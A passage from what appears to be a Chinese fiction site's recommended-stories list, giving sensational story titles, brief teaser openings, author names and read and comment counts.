    茶点故事阅读 30,371评论 2 241
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,891评论 1 256
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,255评论 2 250
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,881评论 3 233
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,010评论 0 8
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,764评论 0 192
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,412评论 2 269
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,299评论 2 260